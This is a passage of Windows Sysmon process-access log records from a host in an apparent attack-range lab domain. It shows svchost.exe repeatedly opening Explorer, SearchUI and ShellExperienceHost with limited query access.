  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98477 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98476 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98475 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98474 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98473 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98472 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98471 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98470 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98469 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98468 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98467 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98466 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98465 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98464 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98463 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98462 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A441-6294-EB00-000000005502} | TargetProcessId: 4800 | TargetImage: C:\Windows\Explorer.EXE
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98461 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44C-6294-0401-000000005502} | TargetProcessId: 4872 | TargetImage: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98460 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44C-6294-0401-000000005502} | TargetProcessId: 4872 | TargetImage: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98459 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44C-6294-0401-000000005502} | TargetProcessId: 4872 | TargetImage: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98458 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44C-6294-0401-000000005502} | TargetProcessId: 4872 | TargetImage: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98457 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44C-6294-0401-000000005502} | TargetProcessId: 4872 | TargetImage: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98456 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44C-6294-0401-000000005502} | TargetProcessId: 4872 | TargetImage: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98455 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
  CallTrace: C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791

EventID 10 | Version 3 | Level 4 | Task 10 | Opcode 0 | Keywords 0x8000000000000000 | EventRecordID 98454 | Channel Microsoft-Windows-Sysmon/Operational | Computer win-dc-ctus-attack-range-994.attackrange.local
  RuleName: - | UtcTime: 2022-05-30 13:02:52.213
  SourceProcessGUID: {326FD73D-A254-6294-0D00-000000005502} | SourceProcessId: 908 | SourceThreadId: 932 | SourceImage: C:\Windows\system32\svchost.exe
  TargetProcessGUID: {326FD73D-A44B-6294-FD00-000000005502} | TargetProcessId: 580 | TargetImage: C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
  GrantedAccess: 0x1000
